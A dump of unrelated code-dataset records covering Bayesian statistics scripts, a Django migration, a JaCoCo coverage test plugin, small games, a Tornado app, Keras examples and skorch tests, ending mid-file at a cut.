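# --- Illustrative sketch (added example, not part of the original engine) ---\n# The Kelly fraction computed in Engine.stat() above, as a standalone helper:\n# with a 60% win rate, a +4% average win and a -2% average loss,\n# kelly = 0.6 - 0.4 / (0.04 / 0.02) = 0.4. All numbers here are assumed.\ndef kelly_fraction_example(win_rate, avg_win_rate, avg_loss_rate):\n    if avg_loss_rate == 0:\n        return win_rate\n    return win_rate - (1 - win_rate) / (avg_win_rate / abs(avg_loss_rate))\n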
","sub_path":"engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":28919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"200402776","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Ang Ming Liang\n\nBased on https://github.com/probml/pmtk3/blob/master/demos/ebBinom.m\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import beta\nimport matplotlib.pyplot as plt\nfrom scipy.special import digamma\nimport pyprobml_utils as pml\n\ny = np.array([\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, \n    1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 5, \n    2, 5, 3, 2, 7, 7, 3, 3, 2, 9, 10, 4, 4, 4, 4, 4, 4, \n    4, 10, 4, 4, 4, 5, 11, 12, 5, 5, 6, 5, 6, 6, 6, 6, \n    16, 15, 15, 9, 4])\n\nn = np.array([20, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 18, 18, 17, \n              20, 20, 20, 20, 19, 19, 18, 18, 25, 24, 23, 20, 20, 20, \n              20, 20, 20, 10, 49, 19, 46, 27, 17, 49, 47, 20, 20, 13, \n              48, 50, 20, 20, 20, 20, 20, 20, 20, 48, 19, 19, 19, 22, \n              46, 49, 20, 20, 23, 19, 22, 20, 20, 20, 52, 46, 47, 24, 14])\n\nX = np.array([y, n-y]).T\n\ndef dirichlet_moment_match(data):\n    a = np.mean(data, axis=0)\n    m2 = np.mean(data*data, axis=0)\n    ok = a > 0\n    s = (a[ok] - m2[ok]) / (m2[ok] - a[ok]**2)\n    s = np.median(s)\n    if s == 0:\n        s = 1\n    return a*s\n\ndef polya_moment_match(data):\n    # use the function argument, not the global X\n    sdata = np.expand_dims(np.sum(data, axis=1), axis=1)\n    p = data / sdata\n    a = dirichlet_moment_match(p)\n    return a\n\ndef polya_fit_simple(data):\n    a = polya_moment_match(data)\n    N, K = data.shape\n    for _ in range(100):\n        sa = np.sum(a)\n        g = np.sum(digamma(data + a), axis=0) - N*digamma(a)\n        h = np.sum(digamma(np.sum(data, axis=1) + sa)) - N*digamma(sa)\n        a = a * g / h\n    return a\n\nalphas = polya_fit_simple(X)\na, b = alphas\n\npopMean = a/(a+b)\naPost = a + y\nbPost = b + n - y\nmeantheta = aPost/(aPost + bPost)\nquartiles = np.array([[beta.ppf(0.25, a, b), beta.ppf(0.75, a, b), beta.ppf(0.50, a, b)] \n                      for (a, b) in zip(aPost, bPost)])\nCItheta, mediantheta = quartiles[:, :2], quartiles[:, 2]\n\nthetaMLE = y/n\nthetaPooledMLE = np.sum(y)/np.sum(n)\nx = np.arange(0, len(y))\n\n# Plot\n\nplt.figure(figsize=(10, 3))\nplt.title('num. positives')\nplt.bar(x, y)\nplt.xlim(0, 70)\nplt.ylim(0, 20)\npml.savefig('num_positives.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title('pop size')\nplt.bar(x, n)\nplt.xlim(0, 70)\nplt.ylim(0, 50)\npml.savefig('pop_size.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title(\"MLE (red line = pooled MLE)\")\nplt.bar(x, thetaMLE)\nplt.plot([0, len(thetaMLE)], [thetaPooledMLE, thetaPooledMLE], color=\"red\")\nplt.xlim(0, 70)\nplt.ylim(0, 0.5)\npml.savefig('mle.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title(\"posterior mean (red line=population mean)\")\nplt.bar(x, meantheta)\nplt.plot([0, len(meantheta)], [popMean, popMean], color=\"red\")\nplt.xlim(0, 70)\nplt.ylim(0, 0.5)\npml.savefig('post_mean.pdf')\nplt.show()\n\nplt.figure(figsize=(15, 10))\nplt.title(\"posterior interquartile ranges (25%-75%, star = median)\")\nfor (height, q, median) in zip(range(len(n)-1, 1, -1), CItheta, mediantheta):\n    plt.plot([q[0], q[1]], [height, height], 'b', alpha=0.5)\n    plt.plot(median, height, 'b*')\nplt.yticks(x)\npml.savefig('CI.pdf')\nplt.show()","sub_path":"scripts/ebBinom.py","file_name":"ebBinom.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"527278889","text":"\nfrom datetime import datetime\nimport json\nimport numpy as np\nimport os\nimport random\nfrom scipy.misc import imsave\nimport cv2\n\nimport argparse\nimport tensorflow as tf\n\n\ndef test():\n    \"\"\"Test Function.\"\"\"\n    print(\"Testing the results\")\n    cap = cv2.VideoCapture('E:/CycleGAN-tensorflow-xhujoy/datasets/video/winter/winter_snow_drive_high_street_fair_1080p.mp4')\n    x = 340\n    # left top corner\n    h = 800\n    w = 800\n    y = 150\n\n    #model_setup()\n    out = cv2.VideoWriter('output.avi', -1, 25.0, (256, 256))\n\n    init = tf.global_variables_initializer()\n\n    with 
tf.Session() as sess:\n sess.run(init)\n _checkpoint_dir='C:/Users/qxy9300/Documents/MA/02_Results/AGGAN_logs/exp_014/20191218-100450_switch40_thres_0.1'\n chkpt_fname = tf.train.latest_checkpoint(_checkpoint_dir)\n print('-------------------> ', chkpt_fname)\n # saver = tf.train.Saver()\n # tf.train.Saver().restore(sess, chkpt_fname)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n # Read until video is completed\n while (cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n # Display the resulting frame\n # cv2.imshow('Frame',frame)\n crop_img = frame[y:y + h, x:x + w]\n resized_img = cv2.resize(crop_img, (256, 256))\n cv2.imshow('CroppedFrame', resized_img)\n\n out_img = save_images_bis(sess, crop_img)\n\n # write the flipped frame\n out.write(out_img)\n\n\n coord.request_stop()\n coord.join(threads)\n\ndef save_images_bis(sess, crop_img):\n \"\"\"\n Saves input and output images.\n\n :param sess: The session.\n :param epoch: Currnt epoch.\n \"\"\"\n\n names = ['input_A_', 'mask_A_', 'masked_inputA_', 'fakeB_',\n 'input_B_', 'mask_B_', 'masked_inputB_', 'fakeA_']\n\n fake_A_temp, fake_B_temp, masks, masked_ims = sess.run([crop_img,\n crop_img,\n crop_img,\n crop_img\n ], feed_dict={\n input_a: crop_img,\n input_b: crop_img,\n transition_rate: 0.1\n })\n tensors = [inputs['images_i'], masks[0], masked_ims[0], fake_B_temp,\n inputs['images_j'], masks[1], masked_ims[1], fake_A_temp]\n\n for name, tensor in zip(names, tensors):\n #image_name = name + str(i) + \".jpg\"\n\n if 'mask_' in name:\n out_img = np.squeeze(tensor[0])\n else:\n out_img = ((np.squeeze(tensor[0]) + 1) * 127.5).astype(np.uint8)\n\n return out_img\n\ntest()","sub_path":"AGGAN/evaluate_video.py","file_name":"evaluate_video.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"576968685","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('apldistro', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Invoice',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('invoice_number', models.CharField(max_length=10, unique=True)),\n ('invoice_date', models.DateField()),\n ('total', models.PositiveIntegerField(null=True, blank=True)),\n ('category', models.CharField(max_length=1, default='S', choices=[('S', 'Store'), ('W', 'Web'), ('A', 'Alocation')])),\n ('status', models.CharField(max_length=1, default='P', choices=[('N', 'None'), ('P', 'Pending'), ('O', 'On Progress'), ('C', 'Cancel'), ('D', 'Delivered/Success')])),\n ('brand', models.ForeignKey(to='apldistro.Brand')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='TransactionDetail',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('article_code', models.CharField(max_length=200)),\n ('article_name', models.CharField(max_length=200)),\n ('article_size', models.CharField(max_length=50)),\n ('article_price', models.PositiveIntegerField()),\n ('quantity', models.PositiveIntegerField(blank=True)),\n ('sub_total', models.PositiveIntegerField(blank=True)),\n ('brand', 
models.ForeignKey(to='apldistro.Brand')),\n ('invoice', models.ForeignKey(to='apltransaction.Invoice')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='transactiondetail',\n unique_together=set([('invoice', 'article_size', 'article_code')]),\n ),\n ]\n","sub_path":"apltransaction/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"330951969","text":"'''\nCreated on Feb 4, 2015\n\n@author: jono\n'''\nimport logging\nfrom . import ExtendedPlugin\nfrom ...interfaces.testcase import ContextHelper\nfrom ...interfaces.config import expand_devices\nfrom ...utils.cm import isofile\nfrom ...utils.version import Product\nimport os\nimport f5test.commands.shell as SCMD\nimport f5test.commands.rest as RCMD\nfrom ...base import AttrDict\nimport json\n\n\nLOG = logging.getLogger(__name__)\nTIMEOUT = 5\nPROJECT = 'bigiq-mgmt'\nRPM_FILE = 'jacoco-*.rpm'\nJACOCO_PACKAGE = 'jacoco-'\nDESTINATION = '/tmp'\nTRIGGER_FILE = '/service/restjavad/jacoco'\nEXEC_FILE = '/shared/tmp/jacoco.exec'\nJACOCO_HOST = '10.145.194.1'\nJAR_DIR = '/usr/share/java/rest'\nJARS = ['f5.rest.adc.shared.jar', 'f5.rest.asm-bigiq.jar',\n 'f5.rest.autodeploy.jar', 'f5.rest.bigiq-adc-core-config.jar',\n 'f5.rest.avr.jar', 'f5.rest.bigiq-adc.jar', 'f5.rest.cloud.jar',\n 'f5.rest.em.jar', 'f5.rest.indexing.jar', 'f5.rest.jar',\n 'f5.rest.security.afm.jar', 'f5.rest.security.asm.jar',\n 'f5.rest.security.base.jar', 'f5.rest.security.common.jar',\n 'f5.rest.security.shared.jar', 'f5.rest.security.websafe.jar']\nJAR_BUNDLE = '/tmp/jacoco_jars.tar.gz'\n\n\nclass Jacoco(ExtendedPlugin):\n \"\"\"\n Install jacoco RPM, enable it and collect results.\n \"\"\"\n enabled = False\n\n def options(self, parser, env):\n \"\"\"Register commandline options.\"\"\"\n parser.add_option('--with-jacoco', action='store_true',\n help=\"Enable jacoco plugin. (default: no)\")\n\n def configure(self, options, noseconfig):\n \"\"\" Call the super and then validate and call the relevant parser for\n the configuration file passed in \"\"\"\n super(Jacoco, self).configure(options, noseconfig)\n\n self.context = ContextHelper()\n if options.get('duts'):\n self.duts = expand_devices(options.duts)\n else:\n cfgifc = self.context.get_config()\n self.duts = [cfgifc.get_device()]\n self.is_installed = False\n\n def make_dirs(self, device):\n session = self.context.get_config().get_session()\n path = os.path.join(session.path, 'jacoco',\n device.get_address())\n path = os.path.expanduser(path)\n path = os.path.expandvars(path)\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n def jenkins_upload(self, sshifc):\n session = self.context.get_config().get_session()\n filename = 'jacoco.exec.%s' % sshifc.address\n with self.context.get_rest(proto='http', address=JACOCO_HOST, port=8080) as rstifc:\n # Force to Connection: close. 
There seems to be a problem with Jetty & keep-alive.\n rstifc.api.no_keepalive = True\n\n LOG.info('Uploading jacoco.exec to Jenkins...')\n headers = {'Content-Type': 'multipart/form-data',\n 'Transfer-Encoding': 'chunked'}\n payload = AttrDict()\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n payload.parameter.append(dict(name='fileName', value=filename))\n payload.parameter.append(dict(name='branch', value='foo'))\n payload.parameter.append(dict(name='version', value='foo'))\n payload.parameter.append(dict(name='jacoco.exec', file='file0'))\n s = json.dumps(payload)\n with sshifc.api.sftp().open(EXEC_FILE) as f:\n # restkit expects the file object to have a name attr\n f.name = filename\n rstifc.api.post('/job/ITE-management-adc-add-code-coverage/build',\n headers=headers, payload={'json': s, 'file0': f})\n\n # Upload .jars bundle here\n LOG.info('Uploading jars pack to Jenkins...')\n filename = os.path.basename(JAR_BUNDLE)\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n payload.parameter.append(dict(name='fileName', value=filename))\n payload.parameter.append(dict(name='branch', value='foo'))\n payload.parameter.append(dict(name='version', value='foo'))\n payload.parameter.append(dict(name='jacoco.exec', file='file0'))\n s = json.dumps(payload)\n\n with sshifc.api.sftp().open(JAR_BUNDLE) as f:\n # restkit expects the file object to have a name attr\n f.name = filename\n rstifc.api.post('/job/ITE-management-adc-add-code-coverage/build',\n headers=headers, payload={'json': s, 'file0': f})\n\n # Trigger a coverage report task\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n s = json.dumps(payload)\n rstifc.api.post('/job/ITE-management-adc-run-code-coverage/build',\n headers=headers, payload={'json': s})\n\n def startTest(self, test, blocking_context=None):\n \"\"\"Install RPM on DUTs (only once)\"\"\"\n if not self.is_installed:\n LOG.info('Enabling jacoco on DUTs...')\n for dut in self.duts:\n with self.context.get_ssh(device=dut) as sshifc:\n if not sshifc.api.exists(TRIGGER_FILE):\n iso = isofile(PROJECT, product=Product.BIGIQ)\n root = os.path.dirname(iso)\n jacoco_rpm = os.path.join(root, 'RPMS', 'noarch', RPM_FILE)\n SCMD.ssh.scp_put(ifc=sshifc, source=jacoco_rpm,\n destination=DESTINATION, nokex=True)\n try:\n sshifc.api.run('bigstart stop restjavad')\n if sshifc.api.exists(EXEC_FILE):\n sshifc.api.remove(EXEC_FILE)\n sshifc.api.run('tar -C {} -czvf {} {}'.format(JAR_DIR, JAR_BUNDLE, ' '.join(JARS)))\n sshifc.api.run('mount -n -o remount,rw /usr')\n sshifc.api.run('touch {}'.format(TRIGGER_FILE))\n sshifc.api.run('rpm -Uvh {}'.format(os.path.join(DESTINATION,\n RPM_FILE)))\n finally:\n sshifc.api.run('mount -n -o remount,ro /usr')\n sshifc.api.run('bigstart start restjavad')\n RCMD.system.wait_restjavad(self.duts)\n self.is_installed = True\n\n def finalize(self, result):\n \"\"\"Collect jacoco.exec results\"\"\"\n if self.is_installed:\n for dut in self.duts:\n LOG.info('Collecting jacoco results from %s...', dut)\n with self.context.get_ssh(device=dut) as sshifc:\n if sshifc.api.exists(TRIGGER_FILE):\n try:\n sshifc.api.run('bigstart stop restjavad')\n sshifc.api.remove(TRIGGER_FILE)\n sshifc.api.run('mount -n -o remount,rw /usr')\n sshifc.api.run('rpm -e {}'.format(JACOCO_PACKAGE))\n finally:\n sshifc.api.run('mount -n -o remount,ro /usr')\n sshifc.api.run('bigstart start restjavad')\n self.is_installed = False\n\n # Download the .exec file\n# path = 
self.make_dirs(dut)\n# SCMD.ssh.scp_get(ifc=sshifc, source=EXEC_FILE,\n# destination=path, nokex=True)\n\n self.jenkins_upload(sshifc)\n sshifc.api.run('rm -f {}'.format(EXEC_FILE))\n\n RCMD.system.wait_restjavad(self.duts)\n self.context.teardown()\n","sub_path":"f5test/noseplugins/extender/jacoco.py","file_name":"jacoco.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155206013","text":"class Solution:\n # iteration\n def preorder(self, root: 'Node') -> List[int]:\n stack, res = [root,], []\n while stack:\n node = stack.pop()\n if node:\n res.append(node.val)\n stack.extend(node.children[::-1])\n return res\n\n # recursive\n def preorder2(self, root: 'Node') -> List[int]:\n res = []\n if not root:\n return res\n res.append(root.val)\n for child in root.children:\n res.extend(self.preorder(child))\n return res","sub_path":"Week_02/589.N-ary_Tree_Preorder_Traversal.py","file_name":"589.N-ary_Tree_Preorder_Traversal.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222951618","text":"# Import and Initialize\r\nimport pygame, mySprites\r\npygame.init()\r\nscreen = pygame.display.set_mode((288, 512))\r\n \r\ndef main():\r\n '''This function defines the 'mainline logic' for the Flappy Bird pygame.'''\r\n \r\n # Display\r\n pygame.display.set_caption(\"Flappy Bird\")\r\n \r\n # Entities\r\n background = pygame.image.load(\"background.png\")\r\n background = background.convert()\r\n screen.blit(background, (0, 0))\r\n \r\n # Sprites for: Pipe, ScoreKeeper, Coin, Bird, Ground, and PointZone\r\n pipe = mySprites.Pipe(screen)\r\n scoreKeeper = mySprites.ScoreKeeper()\r\n coin = mySprites.Coin(screen)\r\n bird = mySprites.Bird(screen)\r\n ground = mySprites.Ground(screen)\r\n pointZone = mySprites.PointZone(screen)\r\n allSprites = pygame.sprite.OrderedUpdates(pointZone, pipe, ground, coin, bird, scoreKeeper) \r\n \r\n # Load \"GameOver\" Image to Display After Game Loop Terminates\r\n gameover = pygame.image.load (\"Game Over.png\")\r\n \r\n # Background Music and Sound Effects\r\n pygame.mixer.music.load(\"background music.wav\")\r\n pygame.mixer.music.set_volume(0.2)\r\n pygame.mixer.music.play(-1)\r\n bing = pygame.mixer.Sound (\"bing.ogg\")\r\n bing.set_volume(0.6)\r\n \r\n died = pygame.mixer.Sound(\"died.ogg\")\r\n died.set_volume(0.6)\r\n \r\n # ACTION\r\n \r\n # Assign \r\n clock = pygame.time.Clock()\r\n keepGoing = True\r\n \r\n # Loop\r\n while keepGoing:\r\n \r\n # Time\r\n clock.tick(30)\r\n \r\n # Events\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n keepGoing = False\r\n elif event.type == pygame.KEYDOWN:\r\n # When the space key is pressed, the go_up() method from the bird class is called\r\n if event.key == pygame.K_SPACE:\r\n bird.go_up()\r\n elif event.type != pygame.KEYDOWN:\r\n # If no key is pressed, the go_down() method from the bird class is called\r\n bird.go_down()\r\n \r\n # Check if the coin was hit, if so, 2 points will be added to the score as bonus \r\n if bird.rect.colliderect(coin):\r\n scoreKeeper.player_scored (2)\r\n coin.died()\r\n \r\n # Check if the bird had collided with the pipe\r\n if bird.rect.colliderect(pipe.rect):\r\n #Check if the bird has collided with a certain point on the pipe\r\n for y in range (0, pipe.rect.bottom):\r\n if bird.rect.collidepoint (pipe.rect.left, y):\r\n #If the bird did not collide with any points, 
continue the game\r\n if y in range (pipe.rect.centery - 30, pipe.rect.centery + 50): \r\n keepGoing = True\r\n # If the bird had collided with any of the points, terminate game\r\n else:\r\n keepGoing = False\r\n \r\n # Check if the bird had collided with pointzone\r\n if bird.rect.colliderect (pointZone.rect):\r\n #Add one point and plays sound effect\r\n scoreKeeper.player_scored (1)\r\n bing.play()\r\n \r\n # End game loop when the player hits the ground\r\n if bird.lost():\r\n pygame.mixer.music.fadeout(2000)\r\n keepGoing = False\r\n \r\n # Check to see if the player has beat the game, if so end the game loop\r\n if scoreKeeper.winner():\r\n pygame.mixer.music.fadeout(2000)\r\n keepGoing = False\r\n \r\n # Check to see if the player is at the half way point of the game, if so, change the background\r\n if scoreKeeper.half_way():\r\n background = pygame.image.load(\"night background.png\")\r\n background = background.convert()\r\n screen.blit(background, (0, 0)) \r\n \r\n # Refresh screen\r\n allSprites.clear(screen, background)\r\n allSprites.update()\r\n allSprites.draw(screen)\r\n \r\n pygame.display.flip()\r\n \r\n #Play ending sound effect \r\n died.play()\r\n # Blit gameover message\r\n screen.blit(gameover, (50, 150))\r\n pygame.display.flip()\r\n # Delay to close the game window\r\n pygame.time.delay(3000) \r\n \r\n # Close the game window\r\n pygame.quit() \r\n \r\n# Call the main function\r\nmain()","sub_path":"Flappy Bird.py","file_name":"Flappy Bird.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"238493085","text":"import os.path\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nfrom tornado.options import define, options\ndefine(\"port\", default=8010, help=\"run on the given port\", type=int)\ndefine(\"debug\", default=0, help=\"1:watch in real time (debug mode)\", type=bool)\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html', colors=10, url=\"http://paletta.mrk1869.com\", title=\"Paletta - HSV Color palette for every Programmer\")\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n debug=options.debug,\n handlers=[(r'/', IndexHandler)],\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\")\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527576125","text":"import random\ndado1 = random.randint(1,10)\ndado2 = random.randint(1,10)\nsoma = dado1+dado2\ndinheiro = 10\nwhile True:\n num1 = int(input(\"Digite um número: \"))\n num2 = int(input(\"Digite outro número: \"))\n if soma<num1:\n print(\"Soma menor\")\n elif soma>num2:\n print(\"Soma maior\")\n else:\n print(\"Soma no meio\")\n break\nprint(\"Você tem {0} dinheiros disponíveis\".format(dinheiro))\nnum_chutes = int(input(\"Quantos chutes você quer comprar? \"))\ndinheiro-=num_chutes\nwhile True:\n if num_chutes==0:\n break\n else:\n chute = int(input(\"Qual foi a soma dos dados? 
\"))\n if chute == soma:\n dinheiro+=dinheiro*3\n break\n else:\n num_chutes-=1\nprint(\"Você terminou o jogo com {0} dinheiros\".format(dinheiro))","sub_path":"backup/user_259/ch131_2020_04_01_17_27_53_169153.py","file_name":"ch131_2020_04_01_17_27_53_169153.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266423706","text":"import numpy as np\nfrom keras.engine import Model\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2\nfrom matplotlib import pyplot as plt\n\nfrom src.bayesian.utils import DrawUnivariateEpistemicUncertaintyCallback\nfrom src.bayesian.callbacks import ModelTest\nfrom src.bayesian.utils import univariate_function_example, univariate_regression_dataset, build_net_architecture, \\\n create_arg_parser\n\n\ndef create_model(X, dropout=0.1, weight_decay=0.01, learning_rate=0.01, learning_rate_decay=1e-5, **kwargs):\n inputs, outputs = build_net_architecture(X.shape[1],\n hidden_neurons=[50, 25],\n activation=['relu', 'sigmoid'],\n weight_decay=weight_decay,\n drouput=dropout)\n last_layer = outputs[0]\n output = Dense(1,\n activation='linear',\n kernel_regularizer=l2(weight_decay) if weight_decay and weight_decay > 0 else None,\n bias_regularizer=l2(weight_decay) if weight_decay and weight_decay > 0 else None)(last_layer)\n model = Model(inputs=inputs, outputs=[output])\n optimiser = SGD(lr=learning_rate, decay=learning_rate_decay)\n model.compile(loss='mean_squared_error', optimizer=optimiser)\n return model\n\n\ndef main():\n parser = create_arg_parser()\n args = parser.parse_args()\n X, y = univariate_regression_dataset()\n if args.verbose:\n print(args.__dict__)\n print('Building model...')\n\n model = create_model(X, **args.__dict__)\n mc_callback = ModelTest(X, y, T=10, test_every_X_epochs=1, loss='euclidean', verbose=0)\n if args.verbose:\n print('model architecture: (layer name, input shape, output shape)')\n for l in model.layers:\n print(type(l), l.input_shape, l.output_shape)\n plt.close('all')\n plt.ion()\n fig, ax = plt.subplots()\n\n x_draw = np.linspace(X.min() - 0.5, X.max() + 0.5, 100).reshape(-1, 1)\n y_draw = univariate_function_example(x_draw)\n draw_callback = DrawUnivariateEpistemicUncertaintyCallback(\n x=x_draw,\n y=y_draw,\n T=args.T,\n ax=ax,\n fig=fig,\n x_train=X,\n y_train=y,\n p_dropout=args.dropout,\n weight_decay=args.weight_decay)\n callbacks = [draw_callback, mc_callback]\n else:\n callbacks = [mc_callback]\n\n model.fit(X, y, batch_size=args.batch_size, epochs=args.epochs,\n callbacks=callbacks, verbose=1 if args.verbose else 0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/examples/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"172739659","text":"import os\n\n\n\"\"\"\ndeletes labels without images to prevent errors\n\nParameters\n----------\n\nimages_folder: str\n images path\n\nlabels_folder: str\n labels path\n\n\"\"\"\n\n\ndef delete_images_with_no_labels(images_folder, labels_folder):\n\n images = [image.split(\".\")[0] for image in os.listdir(images_folder)]\n labels = [label.split(\".\")[0] for label in os.listdir(labels_folder)]\n\n labels_extension = os.listdir(labels_folder)[0].split(\".\")[1]\n\n intersection = set(labels).intersection(images)\n\n labels_with_no_images = set(labels) - intersection\n\n 
[os.remove(labels_folder+\"/\"+label+\".\"+labels_extension) for label in labels_with_no_images]\n","sub_path":"training_api/api/tfrecord_module/more_labels_than_images.py","file_name":"more_labels_than_images.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213414731","text":"def solution(line):\n # please use 4 spaces for indentation, following PEP8\n # return the processed result\n if len(line) == 1:\n return line\n\n line = line.split(\",\")\n if int(line[-1]) > int(line[0]):\n return line[len(line)//2]\n for i in range(len(line)-1):\n if int(line[i]) > int(line[i+1]):\n return line[(len(line)//2 + i+1) % len(line)]\n\n\nif __name__ == \"__main__\":\n # line = \"1\"\n # line = \"1,2,3\"\n # line = \"4,5,6,7,0,1,2\"\n line = \"12,13,14,5,6,7,8,9,10\"\n res = solution(line)\n print(res)\n","sub_path":"小米/找出旋转有序数列的中间值.py","file_name":"找出旋转有序数列的中间值.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"15002781","text":"\"\"\"Test for helper.py\"\"\"\nimport pickle\n\nimport numpy as np\nimport pytest\nimport torch\nfrom sklearn.datasets import make_classification\n\n\nclass TestSliceDict:\n def assert_dicts_equal(self, d0, d1):\n assert d0.keys() == d1.keys()\n for key in d0.keys():\n assert np.allclose(d0[key], d1[key])\n\n @pytest.fixture\n def data(self):\n X, y = make_classification(100, 20, n_informative=10, random_state=0)\n return X.astype(np.float32), y\n\n @pytest.fixture(scope='session')\n def sldict_cls(self):\n from skorch.helper import SliceDict\n return SliceDict\n\n @pytest.fixture\n def sldict(self, sldict_cls):\n return sldict_cls(\n f0=np.arange(4),\n f1=np.arange(12).reshape(4, 3),\n )\n\n def test_init_inconsistent_shapes(self, sldict_cls):\n with pytest.raises(ValueError) as exc:\n sldict_cls(f0=np.ones((10, 5)), f1=np.ones((11, 5)))\n assert str(exc.value) == (\n \"Initialized with items of different lengths: 10, 11\")\n\n @pytest.mark.parametrize('item', [\n np.ones(4),\n np.ones((4, 1)),\n np.ones((4, 4)),\n np.ones((4, 10, 7)),\n np.ones((4, 1, 28, 28)),\n ])\n def test_set_item_correct_shape(self, sldict, item):\n # does not raise\n sldict['f2'] = item\n\n @pytest.mark.parametrize('item', [\n np.ones(3),\n np.ones((1, 100)),\n np.ones((5, 1000)),\n np.ones((1, 100, 10)),\n np.ones((28, 28, 1, 100)),\n ])\n def test_set_item_incorrect_shape_raises(self, sldict, item):\n with pytest.raises(ValueError) as exc:\n sldict['f2'] = item\n assert str(exc.value) == (\n \"Cannot set array with shape[0] != 4\")\n\n @pytest.mark.parametrize('key', [1, 1.2, (1, 2), [3]])\n def test_set_item_incorrect_key_type(self, sldict, key):\n with pytest.raises(TypeError) as exc:\n sldict[key] = np.ones((100, 5))\n assert str(exc.value).startswith(\"Key must be str, not <\")\n\n @pytest.mark.parametrize('item', [\n np.ones(3),\n np.ones((1, 100)),\n np.ones((5, 1000)),\n np.ones((1, 100, 10)),\n np.ones((28, 28, 1, 100)),\n ])\n def test_update_incorrect_shape_raises(self, sldict, item):\n with pytest.raises(ValueError) as exc:\n sldict.update({'f2': item})\n assert str(exc.value) == (\n \"Cannot set array with shape[0] != 4\")\n\n @pytest.mark.parametrize('item', [123, 'hi', [1, 2, 3]])\n def test_set_first_item_no_shape_raises(self, sldict_cls, item):\n with pytest.raises(AttributeError):\n sldict_cls(f0=item)\n\n @pytest.mark.parametrize('kwargs, expected', [\n ({}, 0),\n (dict(a=np.zeros(12)), 12),\n (dict(a=np.zeros(12), b=np.ones((12, 5))), 12),\n
